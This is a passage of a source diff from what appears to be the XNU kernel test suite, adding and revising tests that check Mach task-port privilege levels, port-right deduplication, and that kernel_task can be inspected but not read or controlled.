mach_vm_write(port, - (mach_vm_address_t)&data, - (vm_offset_t)&new_value, - (mach_msg_type_number_t)sizeof(int)); - check_result(kr, type, FULL, FULL, "mach_vm_write", victim); - - vm_offset_t read_value = 0; - mach_msg_type_number_t read_cnt = 0; - kr = mach_vm_read(port, - (mach_vm_address_t)&data, - (mach_msg_type_number_t)sizeof(int), - &read_value, - &read_cnt); - check_result(kr, type, READ, READ, "mach_vm_read", victim); - } - - /************ TASK_GET_SPECIAL_PORT ************/ - - mach_port_t name = MACH_PORT_NULL; - kr = task_get_special_port(port, TASK_KERNEL_PORT, 
&name); - check_result(kr, type, POLY, FULL, "task_get_special_port: TASK_KERNEL_PORT", victim); - - name = MACH_PORT_NULL; - kr = task_get_special_port(port, TASK_READ_PORT, &name); - check_result(kr, type, POLY, READ, "task_get_special_port: TASK_READ_PORT", victim); - if (kr == KERN_SUCCESS) { - kr = mach_port_deallocate(mach_task_self(), name); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } - - name = MACH_PORT_NULL; - kr = task_get_special_port(port, TASK_INSPECT_PORT, &name); - check_result(kr, type, POLY, INSPECT, "task_get_special_port: TASK_INSPECT_PORT", victim); - if (kr == KERN_SUCCESS) { - kr = mach_port_deallocate(mach_task_self(), name); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } - - name = MACH_PORT_NULL; - kr = task_get_special_port(port, TASK_NAME_PORT, &name); - check_result(kr, type, POLY, INSPECT, "task_get_special_port: TASK_NAME_PORT", victim); - if (kr == KERN_SUCCESS) { - kr = mach_port_deallocate(mach_task_self(), name); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } - - name = MACH_PORT_NULL; - kr = task_get_special_port(port, TASK_HOST_PORT, &name); - check_result(kr, type, POLY, FULL, "task_get_special_port: TASK_HOST_PORT", victim); - if (kr == KERN_SUCCESS) { - if (victim == getpid()) { - mach_port_t host = mach_host_self(); - T_QUIET; T_EXPECT_EQ(host, name, "mach_host_self == task_get_special_port(.. 
TASK_HOST_PORT)"); - } - } - - name = MACH_PORT_NULL; - kr = task_get_special_port(port, TASK_BOOTSTRAP_PORT, &name); - check_result(kr, type, POLY, FULL, "task_get_special_port: TASK_BOOTSTRAP_PORT", victim); - - /************ TEST IPC_SPACE_READ AND IPC_SPACE_INSPECT ************/ - if (victim == getpid()) { - mach_port_status_t status; - mach_msg_type_number_t statusCnt = MACH_PORT_LIMITS_INFO_COUNT; - kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &name); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, 0, "mach_port_allocate should succeed"); - - kr = mach_port_get_attributes(port, name, MACH_PORT_LIMITS_INFO, (mach_port_info_t)&status, &statusCnt); - check_result(kr, type, POLY, READ, "mach_port_get_attributes", victim); - - mach_port_context_t context; - kr = mach_port_get_context(port, name, &context); - check_result(kr, type, POLY, READ, "mach_port_get_context", victim); - - kr = mach_port_destruct(mach_task_self(), name, 0, 0); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_destruct"); - } - - ipc_info_space_basic_t sinfo; - kr = mach_port_space_basic_info(port, &sinfo); - check_result(kr, type, INSPECT, INSPECT, "mach_port_space_basic_info", victim); - - /************ MACH_PORT_ALLOCATE ************/ - - mach_port_t new_port = MACH_PORT_NULL; - kr = mach_port_allocate(port, MACH_PORT_RIGHT_RECEIVE, &new_port); - check_result(kr, type, FULL, FULL, "mach_port_allocate", victim); - if (kr == KERN_SUCCESS) { - kr = mach_port_destruct(port, new_port, 0, 0); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_destruct"); - } - - /************ INSPECT INTERFACES ************/ - int counts[2]; - mach_msg_type_number_t size = TASK_INSPECT_BASIC_COUNTS_COUNT; - kr = task_inspect(port, TASK_INSPECT_BASIC_COUNTS, counts, &size); - check_result(kr, type, INSPECT, INSPECT, "task_inspect", victim); - - /************ TASK_SET_SPECIAL_PORT ************/ - - if (type == FULL) { - new_port = MACH_PORT_NULL; - kr = mach_port_allocate(mach_task_self(), 
MACH_PORT_RIGHT_RECEIVE, &new_port); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_allocate"); - kr = mach_port_insert_right(mach_task_self(), new_port, new_port, MACH_MSG_TYPE_MAKE_SEND); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_insert_right"); - - mach_port_t backup; - kr = task_get_special_port(port, TASK_BOOTSTRAP_PORT, &backup); - check_result(kr, type, POLY, FULL, "task_get_special_port", victim); - kr = task_set_special_port(port, TASK_BOOTSTRAP_PORT, new_port); - check_result(kr, type, FULL, FULL, "task_set_special_port", victim); - kr = task_set_special_port(port, TASK_BOOTSTRAP_PORT, backup); - check_result(kr, type, FULL, FULL, "task_set_special_port", victim); - - kr = mach_port_deallocate(mach_task_self(), new_port); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - mach_port_mod_refs(mach_task_self(), new_port, MACH_PORT_RIGHT_RECEIVE, -1); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_mod_refs"); - } - /************ TASK_THREADS ************/ - thread_array_t th_list; - mach_msg_type_number_t th_cnt = 0; - - kr = task_threads(port, &th_list, &th_cnt); - check_result(kr, type, POLY, INSPECT, "task_threads", victim); - - /* Skip thread ports tests if task_threads() fails */ - if (kr != KERN_SUCCESS) { - return; - } - - /************ THREAD_GET_SPECIAL_PORT ************/ - mach_port_t special = MACH_PORT_NULL; - - switch (type) { - case FULL: - kr = thread_get_special_port(th_list[0], THREAD_KERNEL_PORT, &special); - break; - case READ: - kr = thread_get_special_port(th_list[0], THREAD_READ_PORT, &special); - break; - case INSPECT: - kr = thread_get_special_port(th_list[0], THREAD_INSPECT_PORT, &special); - break; - default: - break; - } - - T_QUIET; T_EXPECT_EQ(special, th_list[0], "thread_get_special_port should match task_threads"); - - kr = mach_port_deallocate(mach_task_self(), special); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - - for (unsigned int i = 0; i < th_cnt; i++) { - 
test_thread_port(th_list[i], type, victim); /* polymorphic */ - kr = mach_port_deallocate(mach_task_self(), th_list[i]); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } -} - -static void -test_get_child_port(int with_sleep) -{ - pid_t child_pid; - kern_return_t kr; - mach_port_name_t tr, ti, tp, tn; - - child_pid = fork(); - - if (child_pid < 0) { - T_FAIL("fork failed in test_get_child_port."); - } - - if (child_pid == 0) { - while (1) { - sleep(10); - } - } - - kr = task_for_pid(mach_task_self(), child_pid, &tp); - if (with_sleep) { - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_for_pid for child %u", child_pid); - } else if (kr != 0) { - g_tfpFail++; - } - - kr = task_read_for_pid(mach_task_self(), child_pid, &tr); - if (with_sleep) { - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_read_for_pid for child %u", child_pid); - } else if (kr != 0) { - g_trfpFail++; - } - - kr = task_inspect_for_pid(mach_task_self(), child_pid, &ti); - if (with_sleep) { - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_inspect_for_pid for child %u", child_pid); - } else if (kr != 0) { - g_tifpFail++; - } - - kr = task_name_for_pid(mach_task_self(), child_pid, &tn); - if (with_sleep) { - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_name_for_pid for child %u", child_pid); - } else if (kr != 0) { - g_tnfpFail++; - } - - kr = mach_port_deallocate(mach_task_self(), tp); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - kr = mach_port_deallocate(mach_task_self(), tr); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - kr = mach_port_deallocate(mach_task_self(), ti); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - kr = mach_port_deallocate(mach_task_self(), tn); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - - kill(child_pid, SIGKILL); - int status; - wait(&status); -} - -static void -test_child_exec() -{ - pid_t child_pid; - kern_return_t kr; - mach_port_name_t tr2, ti2, tp2, tn2; - - child_pid = fork(); - - if (child_pid < 0) { - 
T_FAIL("fork failed in test_child_exec."); - } - - if (child_pid == 0) { - execve("/bin/bash", NULL, NULL); - } - - sleep(10); - - kr = task_name_for_pid(mach_task_self(), child_pid, &tn2); - test_task_port(tn2, NAME); - - kr = task_for_pid(mach_task_self(), child_pid, &tp2); - test_task_port(tp2, FULL); - - kr = task_read_for_pid(mach_task_self(), child_pid, &tr2); - test_task_port(tr2, READ); - - kr = task_inspect_for_pid(mach_task_self(), child_pid, &ti2); - test_task_port(ti2, INSPECT); - - kr = mach_port_deallocate(mach_task_self(), tp2); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - kr = mach_port_deallocate(mach_task_self(), tr2); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - kr = mach_port_deallocate(mach_task_self(), ti2); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - kr = mach_port_deallocate(mach_task_self(), tn2); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - - kill(child_pid, SIGKILL); - int status; - wait(&status); -} - -static void * -thread_run() -{ - pthread_mutex_lock(&g_lock); - pthread_mutex_unlock(&g_lock); - - pthread_exit(NULL); - - return NULL; -} - -#ifdef T_NOCODESIGN -#define TEST_NAME inspect_read_port_nocodesign -#else -#define TEST_NAME inspect_read_port -#endif - -T_DECL(TEST_NAME, "inspect and read port test", T_META_ASROOT(true)) -{ - kern_return_t kr; - pid_t pid = 0; - mach_port_t port = MACH_PORT_NULL; - - kr = pid_for_task(mach_task_self(), &pid); - T_EXPECT_MACH_SUCCESS(kr, "pid_for_task: My Pid = %d", pid); - -#ifdef T_NOCODESIGN - T_LOG("Running as non-platform binary...\n"); -#else - T_LOG("Running as platform binary...\n"); -#endif - - kr = task_for_pid(mach_task_self(), pid, &port); - T_EXPECT_EQ(kr, 0, "task_for_pid(mach_task_self..): %u", port); - T_EXPECT_EQ(port, mach_task_self(), "task_for_pid == mach_task_self"); - test_task_port(port, FULL); - - port = MACH_PORT_NULL; - kr = task_read_for_pid(mach_task_self(), pid, &port); - T_EXPECT_EQ(kr, 0, 
"task_read_for_pid(mach_task_self..): read port = %u", port); - test_task_port(port, READ); - kr = mach_port_deallocate(mach_task_self(), port); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - - port = MACH_PORT_NULL; - kr = task_inspect_for_pid(mach_task_self(), pid, &port); - T_EXPECT_EQ(kr, 0, "task_inspect_for_pid(mach_task_self..): inspect port = %u", port); - test_task_port(port, INSPECT); - kr = mach_port_deallocate(mach_task_self(), port); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - - port = MACH_PORT_NULL; - kr = task_name_for_pid(mach_task_self(), pid, &port); - T_EXPECT_EQ(kr, 0, "task_name_for_pid(mach_task_self..): name port = %u", port); - test_task_port(port, NAME); - kr = mach_port_deallocate(mach_task_self(), port); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - - port = MACH_PORT_NULL; - kr = task_read_for_pid(mach_task_self(), 0, &port); - T_EXPECT_NE(kr, 0, "task_read_for_pid for kernel should fail"); - - /* task_read_for_pid loop, check for leaks */ - for (int i = 0; i < 0x1000; i++) { - kr = task_read_for_pid(mach_task_self(), pid, &port); - test_task_port(port, READ); - kr = mach_port_deallocate(mach_task_self(), port); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } - - /* task_inspect_for_pid loop, check for leaks */ - for (int i = 0; i < 0x1000; i++) { - kr = task_inspect_for_pid(mach_task_self(), pid, &port); - test_task_port(port, INSPECT); - kr = mach_port_deallocate(mach_task_self(), port); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } - - /* fork-exec a child process */ - test_child_exec(); - - /* fork, get full/read/inspect/name port for the child then kill it */ - for (int i = 0; i < 10; i++) { - test_get_child_port(TRUE); - } - - T_LOG("tfp fail: %d, trfp fail: %d, tifp fail: %d, tnfp fail: %d, TOTAL: 10\n", - g_tfpFail, g_trfpFail, g_tifpFail, g_tnfpFail); - - - /* task thread loop, check for leaks */ - thread_array_t th_list; - 
mach_msg_type_number_t th_cnt; - pthread_t thread; - - pthread_mutex_init(&g_lock, NULL); - pthread_mutex_lock(&g_lock); - - for (unsigned i = 0; i < 0x100; i++) { - pthread_create(&thread, NULL, thread_run, NULL); - } - - for (unsigned i = 0; i < 0x1000; i++) { - kr = task_threads(mach_task_self(), &th_list, &th_cnt); - T_QUIET; T_ASSERT_EQ(th_cnt, 0x101, "257 threads"); - - for (unsigned j = 0; j < th_cnt; j++) { - kr = mach_port_deallocate(mach_task_self(), th_list[j]); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } - } - pthread_mutex_unlock(&g_lock); - - /* processor_set_tasks_with_flavor */ - - processor_set_name_array_t psets; - processor_set_t pset; - task_array_t tasks; - mach_msg_type_number_t pcnt, tcnt; - mach_port_t host = mach_host_self(); - - kr = host_processor_sets(host, &psets, &pcnt); - kr = host_processor_set_priv(host, psets[0], &pset); - - kr = processor_set_tasks_with_flavor(pset, TASK_FLAVOR_CONTROL, &tasks, &tcnt); - T_EXPECT_EQ(kr, 0, "processor_set_tasks_with_flavor: TASK_FLAVOR_CONTROL should succeed"); - for (unsigned int i = 0; i < tcnt; i++) { - test_task_port(tasks[i], FULL); - kr = mach_port_deallocate(mach_task_self(), tasks[i]); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } - - kr = processor_set_tasks_with_flavor(pset, TASK_FLAVOR_READ, &tasks, &tcnt); - T_EXPECT_EQ(kr, 0, "processor_set_tasks_with_flavor: TASK_FLAVOR_READ should succeed"); - for (unsigned int i = 0; i < tcnt; i++) { - test_task_port(tasks[i], READ); - kr = mach_port_deallocate(mach_task_self(), tasks[i]); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } - - kr = processor_set_tasks_with_flavor(pset, TASK_FLAVOR_INSPECT, &tasks, &tcnt); - T_EXPECT_EQ(kr, 0, "processor_set_tasks_with_flavor: TASK_FLAVOR_INSPECT should succeed"); - for (unsigned int i = 0; i < tcnt; i++) { - test_task_port(tasks[i], INSPECT); - kr = mach_port_deallocate(mach_task_self(), tasks[i]); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, 
"mach_port_deallocate"); - } - - kr = processor_set_tasks_with_flavor(pset, TASK_FLAVOR_NAME, &tasks, &tcnt); - T_EXPECT_EQ(kr, 0, "processor_set_tasks_with_flavor: TASK_FLAVOR_NAME should succeed"); - for (unsigned int i = 0; i < tcnt; i++) { - test_task_port(tasks[i], NAME); - kr = mach_port_deallocate(mach_task_self(), tasks[i]); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } - - // Cleanup - for (unsigned int i = 0; i < pcnt; i++) { - kr = mach_port_deallocate(mach_task_self(), psets[i]); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } - - kr = mach_port_deallocate(mach_task_self(), pset); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); -} diff --git a/tests/ipc_mach_port.c b/tests/ipc_mach_port.c new file mode 100644 index 000000000..b17dbc0f5 --- /dev/null +++ b/tests/ipc_mach_port.c @@ -0,0 +1,190 @@ +#include +#include +#include +#include +#include +#include "exc_helpers.h" + +T_GLOBAL_META( + T_META_NAMESPACE("xnu.ipc"), + T_META_RUN_CONCURRENTLY(true)); + +#pragma mark - helpers + +#define SERVICE_NAME "com.apple.xnu.test.mach_port" + +struct one_port_msg { + mach_msg_header_t header; + mach_msg_body_t body; + mach_msg_port_descriptor_t port_descriptor; + mach_msg_trailer_t trailer; // subtract this when sending +}; + +static mach_port_t +server_checkin(void) +{ + mach_port_t mp; + kern_return_t kr; + + kr = bootstrap_check_in(bootstrap_port, SERVICE_NAME, &mp); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "bootstrap_check_in"); + return mp; +} + +static mach_port_t +server_lookup(void) +{ + mach_port_t mp; + kern_return_t kr; + + kr = bootstrap_look_up(bootstrap_port, SERVICE_NAME, &mp); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "bootstrap_look_up"); + return mp; +} + +static mach_port_t +make_sr_port(void) +{ + mach_port_options_t opts = { + .flags = MPO_INSERT_SEND_RIGHT, + }; + kern_return_t kr; + mach_port_t port; + + kr = mach_port_construct(mach_task_self(), &opts, 0ull, &port); + T_QUIET; 
T_ASSERT_MACH_SUCCESS(kr, "mach_port_construct"); + return port; +} + +static void +destroy_port(mach_port_t port, bool receive, int srights) +{ + kern_return_t kr; + + if (srights) { + kr = mach_port_mod_refs(mach_task_self(), port, + MACH_PORT_RIGHT_SEND, -srights); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "srights -= %d", srights); + } + if (receive) { + kr = mach_port_mod_refs(mach_task_self(), port, + MACH_PORT_RIGHT_RECEIVE, -1); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "receive -= 1"); + } +} + +static void +send_port( + mach_msg_id_t id, + mach_port_t dest, + mach_port_t right, + mach_msg_type_name_t disp) +{ + struct one_port_msg msg = { + .header = { + .msgh_remote_port = dest, + .msgh_bits = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_COPY_SEND, + 0, MACH_MSG_TYPE_MOVE_SEND, MACH_MSGH_BITS_COMPLEX), + .msgh_id = id, + .msgh_size = offsetof(struct one_port_msg, trailer), + }, + .body = { + .msgh_descriptor_count = 1, + }, + .port_descriptor = { + .name = right, + .disposition = disp, + .type = MACH_MSG_PORT_DESCRIPTOR, + }, + }; + kern_return_t kr; + + kr = mach_msg(&msg.header, MACH_SEND_MSG | MACH_SEND_TIMEOUT, + msg.header.msgh_size, 0, MACH_PORT_NULL, 10000, 0); + + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "send(%d)", id); +} + +#pragma mark - basic test about right deduplication + +static mach_port_t +receive_port( + mach_msg_id_t expected_id, + mach_port_t rcv_port, + mach_msg_type_name_t expected_disp) +{ + struct one_port_msg msg = { }; + kern_return_t kr; + + T_LOG("waiting for message %d", expected_id); + kr = mach_msg(&msg.header, MACH_RCV_MSG, 0, + sizeof(msg), rcv_port, 0, 0); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "receive(%d)", expected_id); + T_QUIET; T_ASSERT_EQ(msg.header.msgh_id, expected_id, "message id matches"); + T_QUIET; T_ASSERT_NE(msg.header.msgh_bits & MACH_MSGH_BITS_COMPLEX, 0, + "message is complex"); + T_QUIET; T_ASSERT_EQ(msg.body.msgh_descriptor_count, 1, "message has one right"); + T_QUIET; T_ASSERT_EQ(msg.port_descriptor.disposition, expected_disp, 
+ "port has right disposition"); + return msg.port_descriptor.name; +} + +T_HELPER_DECL(right_dedup_server, "right_dedup_server") +{ + mach_port_t svc_port = server_checkin(); + mach_port_t ports[3]; + + ports[0] = receive_port(1, svc_port, MACH_MSG_TYPE_MOVE_RECEIVE); + ports[1] = receive_port(2, svc_port, MACH_MSG_TYPE_MOVE_SEND); + ports[2] = receive_port(3, svc_port, MACH_MSG_TYPE_MOVE_SEND); + T_ASSERT_EQ(ports[0], ports[1], "receive, send, send"); + T_ASSERT_EQ(ports[0], ports[2], "receive, send, send"); + destroy_port(ports[0], true, 2); + + ports[0] = receive_port(4, svc_port, MACH_MSG_TYPE_MOVE_SEND); + ports[1] = receive_port(5, svc_port, MACH_MSG_TYPE_MOVE_RECEIVE); + ports[2] = receive_port(6, svc_port, MACH_MSG_TYPE_MOVE_SEND); + T_ASSERT_EQ(ports[0], ports[1], "send, receive, send"); + T_ASSERT_EQ(ports[0], ports[2], "send, receive, send"); + destroy_port(ports[0], true, 2); + + ports[0] = receive_port(7, svc_port, MACH_MSG_TYPE_MOVE_SEND); + ports[1] = receive_port(8, svc_port, MACH_MSG_TYPE_MOVE_SEND); + ports[2] = receive_port(9, svc_port, MACH_MSG_TYPE_MOVE_RECEIVE); + T_ASSERT_EQ(ports[0], ports[1], "send, send, receive"); + T_ASSERT_EQ(ports[0], ports[2], "send, send, receive"); + destroy_port(ports[0], true, 2); + + T_END; +} + +T_HELPER_DECL(right_dedup_client, "right_dedup_client") +{ + mach_port_t svc_port = server_lookup(); + mach_port_t port; + + port = make_sr_port(); + send_port(1, svc_port, port, MACH_MSG_TYPE_MOVE_RECEIVE); + send_port(2, svc_port, port, MACH_MSG_TYPE_COPY_SEND); + send_port(3, svc_port, port, MACH_MSG_TYPE_MOVE_SEND); + + port = make_sr_port(); + send_port(4, svc_port, port, MACH_MSG_TYPE_COPY_SEND); + send_port(5, svc_port, port, MACH_MSG_TYPE_MOVE_RECEIVE); + send_port(6, svc_port, port, MACH_MSG_TYPE_MOVE_SEND); + + port = make_sr_port(); + send_port(7, svc_port, port, MACH_MSG_TYPE_COPY_SEND); + send_port(8, svc_port, port, MACH_MSG_TYPE_MOVE_SEND); + send_port(9, svc_port, port, MACH_MSG_TYPE_MOVE_RECEIVE); +} + 
+T_DECL(right_dedup, "make sure right deduplication works") +{ + dt_helper_t helpers[] = { + dt_launchd_helper_domain("com.apple.xnu.test.mach_port.plist", + "right_dedup_server", NULL, LAUNCH_SYSTEM_DOMAIN), + dt_fork_helper("right_dedup_client"), + }; + dt_run_helpers(helpers, 2, 600); +} diff --git a/tests/kdebug.c b/tests/kdebug.c index 6aacdccc0..e6de871d9 100644 --- a/tests/kdebug.c +++ b/tests/kdebug.c @@ -19,6 +19,7 @@ #include #include "ktrace_helpers.h" +#include "test_utils.h" T_GLOBAL_META( T_META_NAMESPACE("xnu.ktrace"), @@ -623,25 +624,6 @@ static const uint32_t noprocfilt_evts[EXP_KERNEL_EVENTS] = { BSDDBG_CODE(DBG_BSD_KDEBUG_TEST, 19), }; -static bool -is_development_kernel(void) -{ - static dispatch_once_t is_development_once; - static bool is_development; - - dispatch_once(&is_development_once, ^{ - int dev; - size_t dev_size = sizeof(dev); - - T_QUIET; - T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.development", &dev, - &dev_size, NULL, 0), NULL); - is_development = (dev != 0); - }); - - return is_development; -} - static void expect_event(struct trace_point *tp, const char *name, unsigned int *events, const uint32_t *event_ids, size_t event_ids_len) diff --git a/tests/kernel_inspection.c b/tests/kernel_inspection.c new file mode 100644 index 000000000..6fa087d99 --- /dev/null +++ b/tests/kernel_inspection.c @@ -0,0 +1,207 @@ +#ifdef T_NAMESPACE +#undef T_NAMESPACE +#endif + +#include + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +T_GLOBAL_META(T_META_NAMESPACE("xnu.ipc"), + T_META_RUN_CONCURRENTLY(true)); + +/* + * Attempt to inspect kernel_task using a task_inspect_t. Interact with the + * kernel in the same way top(1) and lsmp(1) do. 
+ */ + +static int found_kernel_task = 0; + +static void +check_secure_kernel(void) +{ + int secure_kern = 0; + size_t secure_kern_size = sizeof(secure_kern); + + T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.secure_kernel", &secure_kern, + &secure_kern_size, NULL, 0), NULL); + + if (secure_kern) { + T_SKIP("secure kernel: processor_set_tasks will not return kernel_task"); + } +} + +static void +attempt_kernel_inspection(task_t task) +{ + pid_t pid = (pid_t)-1; + mach_msg_type_number_t i, count, thcnt; + struct task_basic_info_64 ti; + thread_act_array_t threads; + + if (pid_for_task(task, &pid)) { + return; + } + + T_QUIET; T_LOG("Checking pid %d", pid); + + if (pid != 0) { + return; + } + + T_LOG("found kernel_task, attempting to inspect"); + found_kernel_task++; + + count = TASK_BASIC_INFO_64_COUNT; + T_EXPECT_MACH_SUCCESS(task_info(task, TASK_BASIC_INFO_64, (task_info_t)&ti, + &count), "task_info(... TASK_BASIC_INFO_64 ...)"); + + T_EXPECT_MACH_SUCCESS(task_threads(task, &threads, &thcnt), "task_threads"); + T_LOG("Found %d kernel threads.", thcnt); + for (i = 0; i < thcnt; i++) { + kern_return_t kr; + thread_basic_info_data_t basic_info; + mach_msg_type_number_t bi_count = THREAD_BASIC_INFO_COUNT; + + kr = thread_info(threads[i], THREAD_BASIC_INFO, + (thread_info_t)&basic_info, &bi_count); + /* + * Ignore threads that have gone away. + */ + if (kr == MACH_SEND_INVALID_DEST) { + T_LOG("ignoring thread that has been destroyed"); + continue; + } + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "thread_info(... 
THREAD_BASIC_INFO ...)"); + + /* Now try out READ (skip eval) interfaces on kernel thread */ + mach_msg_type_number_t msk_count = EXC_TYPES_COUNT; + exception_mask_t masks[EXC_TYPES_COUNT]; + ipc_info_port_t ports_info[EXC_TYPES_COUNT]; + exception_behavior_t behaviors[EXC_TYPES_COUNT]; + thread_state_flavor_t flavors[EXC_TYPES_COUNT]; + kr = thread_get_exception_ports_info(threads[i], EXC_MASK_ALL, masks, &msk_count, ports_info, behaviors, flavors); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "thread_get_exception_ports_info() on kernel thread: 0x%x", kr); + + /* READ (with eval) interfaces should fail */ + mach_port_t voucher; + kr = thread_get_mach_voucher(threads[i], 0, &voucher); + T_QUIET; T_EXPECT_EQ(kr, KERN_INVALID_ARGUMENT, "thread_get_mach_voucher() should fail with KERN_INVALID_ARGUMENT"); + + (void)mach_port_deallocate(mach_task_self(), threads[i]); + } + mach_vm_deallocate(mach_task_self(), + (mach_vm_address_t)(uintptr_t)threads, + thcnt * sizeof(*threads)); + + ipc_info_space_basic_t basic_info; + T_EXPECT_MACH_SUCCESS(mach_port_space_basic_info(task, &basic_info), "mach_port_space_basic_info"); + + ipc_info_space_t info_space; + ipc_info_name_array_t table; + ipc_info_tree_name_array_t tree; + mach_msg_type_number_t tblcnt = 0, treecnt = 0; + T_EXPECT_MACH_SUCCESS(mach_port_space_info(task, &info_space, &table, + &tblcnt, &tree, &treecnt), "mach_port_space_info"); + if (tblcnt > 0) { + mach_vm_deallocate(mach_task_self(), + (mach_vm_address_t)(uintptr_t)table, + tblcnt * sizeof(*table)); + } + if (treecnt > 0) { + mach_vm_deallocate(mach_task_self(), + (mach_vm_address_t)(uintptr_t)tree, + treecnt * sizeof(*tree)); + } + + /* Now try out READ (skip eval) interfaces on kernel task */ + mach_msg_type_number_t msk_count = EXC_TYPES_COUNT; + exception_mask_t masks[EXC_TYPES_COUNT]; + ipc_info_port_t ports_info[EXC_TYPES_COUNT]; + exception_behavior_t behaviors[EXC_TYPES_COUNT]; + thread_state_flavor_t flavors[EXC_TYPES_COUNT]; + kern_return_t kr = 
task_get_exception_ports_info(task, EXC_MASK_ALL, masks, &msk_count, ports_info, behaviors, flavors); + T_EXPECT_MACH_SUCCESS(kr, "task_get_exception_ports_info() on kernel_task: 0x%x", kr); + + /* READ (with eval) interfaces should fail */ + vm_offset_t data; + mach_msg_type_number_t cnt; + mach_vm_address_t addr = 0x10000000; /* can be whatever, the call should fail before getting to VM */ + + kr = mach_vm_read(task, (mach_vm_address_t)addr, 8, &data, &cnt); + T_EXPECT_EQ(kr, KERN_INVALID_ARGUMENT, "mach_vm_read() should fail with KERN_INVALID_ARGUMENT"); + + mach_port_t voucher; + kr = task_get_mach_voucher(task, 0, &voucher); + T_EXPECT_EQ(kr, KERN_INVALID_TASK, "task_get_mach_voucher() should fail with KERN_INVALID_TASK"); + + /* Control interfaces should absolutely fail */ + kr = task_set_mach_voucher(task, mach_task_self()); /* voucher arg is unused, can be whatever port */ + T_EXPECT_EQ(kr, KERN_INVALID_TASK, "task_set_mach_voucher() should fail with KERN_INVALID_TASK"); +} + +T_DECL(inspect_kernel_task, + "ensure that kernel task can be inspected", + T_META_CHECK_LEAKS(false), + T_META_ASROOT(true)) +{ + processor_set_name_array_t psets; + processor_set_t pset; + task_array_t tasks; + mach_msg_type_number_t i, j, tcnt, pcnt = 0; + mach_port_t self = mach_host_self(); + + check_secure_kernel(); + + T_ASSERT_MACH_SUCCESS(host_processor_sets(self, &psets, &pcnt), + NULL); + + for (i = 0; i < pcnt; i++) { + T_ASSERT_MACH_SUCCESS(host_processor_set_priv(self, psets[i], &pset), NULL); + T_LOG("Checking pset %d/%d", i, pcnt - 1); + + tcnt = 0; + T_LOG("Attempting kernel inspection with control port..."); + T_ASSERT_MACH_SUCCESS(processor_set_tasks(pset, &tasks, &tcnt), NULL); + + for (j = 0; j < tcnt; j++) { + attempt_kernel_inspection(tasks[j]); + mach_port_deallocate(mach_task_self(), tasks[j]); /* the rights live in our own IPC space; the host port is not a valid target */ + } + + /* free tasks array */ + mach_vm_deallocate(mach_task_self(), + (mach_vm_address_t)(uintptr_t)tasks, + tcnt * sizeof(*tasks)); + + T_LOG("Attempting kernel inspection with 
